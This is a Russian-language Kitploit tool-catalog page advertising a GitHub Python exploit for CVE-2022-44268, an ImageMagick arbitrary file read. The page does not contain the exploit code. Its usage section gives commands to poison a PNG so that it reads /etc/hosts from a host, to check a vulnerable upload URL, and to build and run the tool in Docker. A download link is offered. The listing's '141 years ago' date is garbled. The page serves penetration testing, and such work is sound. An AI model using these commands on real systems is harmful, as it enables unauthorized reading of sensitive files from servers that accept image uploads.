Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2022-44268 — Python-эксплойт для CVE-2022-44268, уязвимости произвольного чтения файлов в ImageMagick. Отравляет PNG-изображения для чтения конфиденциальных файлов с уязвимых хостов через веб-загрузку. | Kitploit
Инструменты/GitHubGitHub/mouftan/cve-2022-44268
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииЭксплуатация Бинарных Файлов
GitHubmouftan/cve-2022-44268

CVE-2022-44268

Python-эксплойт для CVE-2022-44268, уязвимости произвольного чтения файлов в ImageMagick. Отравляет PNG-изображения для чтения конфиденциальных файлов с уязвимых хостов через веб-загрузку.

Репозиторий
141 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2022-44268 🧙‍♂️

CVE-2022-44268 ImageMagick: произвольное чтение файлов

Использование 🛠

Отравляем изображение ☣️

root@kitploit:~
python3 CVE-2022-44268.py --image imagetopoison.png --file-to-read /etc/hosts --output poisoned.png
root@kitploit:~
Upload poisoned PNG image.

Проверяем, успешен ли эксплойт 🗡

root@kitploit:~
python3 CVE-2022-44268.py --url http://vulnerable-imagemagick.com/uploads/vulnerable.png

Запуск из Docker 🐳

Сборка

root@kitploit:~
docker build -t cve-2022-44268 .

Запуск

root@kitploit:~
docker run -v $(pwd)/data:/data -ti cve-2022-44268 --image /data/random.png --file-to-read "/etc/hosts" --output /data/poisoned.png

Параметры 🧰

ПараметрОписаниеТип
--urlURL загруженного PNG-изображенияСтрока
--imageВходной PNG-файлФайл
--outputВыходной PNG-файлФайл
--file-to-readФайл для чтения с уязвимого хостаСтрока
Скачать инструмент